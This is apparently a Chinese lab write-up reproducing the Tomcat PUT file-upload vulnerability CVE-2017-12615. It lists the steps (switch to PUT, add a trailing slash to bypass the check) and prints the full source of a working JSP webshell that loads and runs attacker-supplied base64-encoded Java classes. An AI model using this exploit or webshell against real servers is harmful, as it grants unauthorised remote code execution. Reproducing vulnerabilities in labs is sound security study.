Tomcat文件上传(CVE-2017-12615)漏洞复现
东东 Lv2
  2023-08-24 19:04:51 2023-08-24 19:04   2023-08-24 19:08:17      186 字  1 分钟  

1、启动环境

image

2、打开Burpsuite进行抓包,点击网页刷新

image

3、GET修改为PUT,在文件名后面添加斜杠 / 来进行绕过

image

4、写入jsp一句话木马

<%!

class U extends ClassLoader {

​ U(ClassLoader c) {

​ super(c);

​ }

​ public Class g(byte[] b) {

​ return super.defineClass(b, 0, b.length);

​ }

}

public byte[] base64Decode(String str) throws Exception {

​ try {

​ Class clazz = Class.forName(“sun.misc.BASE64Decoder”);

​ return (byte[]) clazz.getMethod(“decodeBuffer”, String.class).invoke(clazz.newInstance(), str);

​ } catch (Exception e) {

​ Class clazz = Class.forName(“java.util.Base64”);

​ Object decoder = clazz.getMethod(“getDecoder”).invoke(null);

​ return (byte[]) decoder.getClass().getMethod(“decode”, String.class).invoke(decoder, str);

​ }

}

%>

<%

String cls = request.getParameter(“passwd”);

if (cls != null) {

​ new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);

}

%>

5、写入jsp一句话木马,进入该网址

image

6、连接蚁剑,密码pass

image

image

7、进入该主目录下tmp,找到flag

image

  • 本文标题Tomcat文件上传(CVE-2017-12615)漏洞复现
  • 本文作者东东
  • 创建时间2023-08-24 19:04:51
  • 本文链接2023/08/24/Tomcat文件上传(CVE-2017-12615)漏洞复现/
  • 版权声明本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
 评论
  1. 1.
    1. 1.0.0.1. 3、GET修改为PUT,在文件名后面添加斜杠 / 来进行绕过
    2. 1.0.0.2. 4、写入jsp一句话木马
    3. 1.0.0.3. 5、写入jsp一句话木马,进入该网址